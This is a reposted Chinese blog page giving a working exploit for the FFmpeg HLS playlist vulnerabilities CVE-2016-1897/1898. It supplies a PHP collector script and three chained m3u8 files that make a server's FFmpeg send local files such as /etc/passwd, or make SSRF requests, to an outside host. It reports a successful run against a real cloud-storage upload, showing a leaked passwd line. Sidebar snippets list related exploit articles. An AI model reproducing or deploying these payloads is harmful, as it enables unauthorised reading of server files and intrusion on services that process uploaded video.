CVE-2016-1897/8 - FFMpeg vulnerability analysis

最新推荐文章于 2023-04-12 13:06:12 发布
最新推荐文章于 2023-04-12 13:06:12 发布
阅读量227 收藏
点赞数
文章标签: php ffmpeg python
原文链接:https://my.oschina.net/u/2393235/blog/674500
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

 

Vulnerability exploit methods are as follows:

一共4个文件:



comm.php (接收用的 也可以用监听一个端口)
 

code 区域

<?php

file_put_contents(time()."_test.txt",$_GET['x']);

?>







header.m3u8 (视频格式文件)


 

code 区域

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:,

http://www.u-url.org/exp/movie/comm.php?x=







remote.m3u8 (第二次转发的)


 

code 区域

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

concat:http://www.u-url.org/exp/movie/header.m3u8|http://baidu.com

#EXT-X-ENDLIST




 

code 区域

http://baidu.com  也可以换成 本地资源文件: /etc/passwd



test.mp4 (最终上传触发)


 

code 区域

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

concat:http://www.u-url.org/exp/movie/remote.m3u8

#EXT-X-ENDLIST




 

漏洞证明:

一切准备号了之后就上传test.mp4到360云盘上去。


 

QQ截图20160505161656.png




 

code 区域

root:x:0:0:root:/root:/bin/bash



也可以ssrf

Detailed content link:

https://habrahabr.ru/company/mailru/blog/274855/

 

转载于:https://my.oschina.net/u/2393235/blog/674500

weixin_34221112
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FFmpeg任意文件读取漏洞分析
fly小灰灰的专栏
07-31 4938
1. 漏洞描述 漏洞简述: 漏洞利用了FFmpeg可以处理HLS播放列表的特性,而播放列表可以引用外部文件。通过在AVI文件中添加自定义的包含本地文件引用的HLS播放列表,可以触发该漏洞并在该文件播放过程中显示本地文件的内容 漏洞发现者:Neex 影响版本:FFmpeg < 3.3.2 2. FFmpeg 背景知识简介  FFmpeg是一套可以用来记录、转换数字音频、视频,并能将其转化为流的开源计算
利用Vulnhub复现漏洞 - ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)
JiangBuLiu的博客
07-05 2192
ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 https://vulhub.org/#/environments/ffmpeg/CVE-2016-1897/ 漏洞原理 在FFMpeg2.X 由于在解析HTTP Live Streaming流媒体m3u8文...
ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)
EC_Carrot的博客
06-03 2410
影响范围 FFmpeg 2.8.x < 2.8.5 FFmpeg 2.7.x < 2.7.5 FFmpeg 2.6.x < 2.6.7 FFmpeg 2.5.x < 2.5.10 漏洞环境 环境访问8080端口可以看到一个上传界面 由于vulhub并没有讲述该漏洞如何复现,我们需要进入环境查看源码 <?php if(!empty($_FILES)) { $filename = escapeshellarg($_FILES['file']['tmp_name']);
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅 我也会不定期再中间更新复现文章链接 目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
升级FFMPEG2.6到3.0.2
weixin_33933118的博客
05-07 277
因昨晚收到阿里云邮件,指出FFmpeg 2.x被爆高危漏洞(CVE-2016-1897CVE-2016-1898),黑客可通过上传构造的hls切片索引文件,远程窃取服务器端本地文件。FFmpeg 多个版本的用户存在被攻击的风险! 详情可以看这里。公司的视频转换服务器刚好是这个漏洞范围内的,版本2.6,服务器版本CentOS6.5.记录下...
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
CVE-2016-3720
02-22
这个项目是CVE-2016-3720 Demo,为了避免搭建环境,大佬们可以直接获取到这个资源。 相对应的分析文章是:https://blog.csdn.net/qq_36869808 可以在这篇文章看到分析的内容,感谢~当然如果非常需要这个资源,也...
m3u8文件格式加密视频下载地址获取并转换为MP4
qq_41095608的博客
04-12 4680
打开视频点击播放然后进入到安卓缓存目录(隐藏目录)找到带m3u8的文件使用文本(文档)方式打开即可找到带ts的链接(暗示已经获得索引目录),例如https://****cdn.com:443/2023***/u83835/1500kb/hls/dhahg.ts。例如https://****/play/cdn.com:443/2023***/u83835/1500kb/hls/dhahg.ts。方法1. https://****cdn.com:443/2023***/u83835/1500kb/hls/
CVE-2018-2893:反弹shell生成器
04-29
本软件仅限用于学习交流禁止用于任何非法行为 起这个名字主要目的是蹭一下2893的热度,反弹shell生成器 主要作用是生成自己的外网nc监听对象,希望可以帮助到一些代码小白,2893 2628不适用需要借助第三方服务端口生成远程服务 github搬运工
CVE-2016-1897/8 - FFMpeg漏洞分析
weixin_33782386的博客
03-08 448
数据流 · 2016/05/09 10:03Author:数据流(LeeFly)@伏宸安全实验室0x00 前言这段时间有不少漏洞突然爆发,就像这几天的ImageMagick漏洞,横扫国内互联网。这一两天在乌云@Noxxx首先发了两个大厂商的FFmpeg的漏洞,然后也被其他白帽子陆续提交漏洞。影响范围和严重性虽然没有ImageMagick大,但也有不少大厂商中招,而它们共同之处都是处理文件的通用组件...
FFmpeg文件读取漏洞(CVE-2017-9993)
Unitue_逆流
10-18 2731
https://www.ichunqiu.com/course/59111?f=1 介绍: FFmpeg是一个完整的跨平台解决方案,用于记录、转换流式传输音频和视频,可用于预览生成和视频转换的视频编码软件。目前有非常多的视音频软件或是视频网站、手机APP都采用了这个库,但是这个库历史上曝出的漏洞也非常之多。此次漏洞利用了FFmpeg可以处理HLS播放列表的特性,而播放列表可以引用外部文件。通过在
android m3u8合成ts,M3U8-TS文件合并为MP4文件
weixin_35744849的博客
05-28 4941
M3U8文件是一个索引文件,里面包好N个TS的分片文件,组成一个视频文件。目前在直播和点播中应用非常广泛。我们下载一个M3U8视频文件,就是下载了N个TS分片文件,导致我们手机相册中多了很多碎片的小视频文件。如果是羞羞的视频,更加不好意思了。删除都要删除半天,更不用说想把M3U8文件拷贝出来,放到电脑上观看欣赏。例如给一个M3U8例子:https://tv2.youkutv.cc/2020/04/...
tomcat反序列化漏洞(cve-2016-8735)
蚁景网安学院
10-25 3680
复现起源:近期在项目中碰到的ApacheTomcat中间件愈来愈多,于是乎。想着做一个整理。将ApacheTomcat中间件的几大较为重要的高危漏洞做一个总结整理复现。用作来巩固更新自己...
M3U8格式视频下载
热门推荐
YQXH_Wang的博客
10-28 5万+
M3U8是一种流媒体,现多用于视频播放。当把m3u8格式视频的url下载下来用文本打开会发现其实只是一段字符串,包含了很多视频小片段的地址,那么怎么样把整个视频下载下来用于本地播放呢?首先,m3u8展开后的字符串类似这样: #EXTM3U #EXT-X-TARGETDURATION:30 #EXT-X-VERSION:2 #EXT-X-DISCONTINUITY #EXTINF:10, h
Apache Tomcat 反序列化代码执行漏洞复现(CVE-2020-9484)
锋刃科技的博客
06-24 8130
前言 Apache Tomcat是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。 当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。 漏洞分析 1、攻击者能够控制服务器上文件的内容和文件名称 2、服务器PersistenceManager配置中使用了FileStore .
ts文件解析_M3U8TS文件合并为MP4文件
weixin_39883374的博客
12-01 3638
M3U8文件是一个索引文件,里面包好N个TS的分片文件,组成一个视频文件。目前在直播和点播中应用非常广泛。我们下载一个M3U8视频文件,就是下载了N个TS分片文件,导致我们手机相册中多了很多碎片的小视频文件。如果是羞羞的视频,更加不好意思了。删除都要删除半天,更不用说想把M3U8文件拷贝出来,放到电脑上观看欣赏。例如给一个M3U8例子:https://tv2.youkutv.cc/202...
CVE-2016-6816、CVE-2016-8735、CVE-2016-8745、CVE-2017-5647
小徕虫的博客
01-21 7434
Tomcat 升级 版本信息 当前环境中用的是 6.0.47 发现漏洞 Apache Tomcat 安全限制绕过漏洞(CVE-2016-8735) Apache Tomcat 安全漏洞(CVE-2017-5647) Apache Tomcat信息泄露漏洞(CVE-2016-8745) Apache Tomcat 安全限制绕过漏洞(CVE-2016-6816) 漏洞信息 CVE-2017-5...
windows server cve-2016-2183 ssl/tls协议信息泄露漏洞修复脚本
最新发布
05-01
CVE-2016-2183是一种SSL/TLS协议信息泄露漏洞,可能允许攻击者披露SSL/TLS连接的一些内容,包括密钥。为了缓解该漏洞的风险,需要使用Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本。 修复脚本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值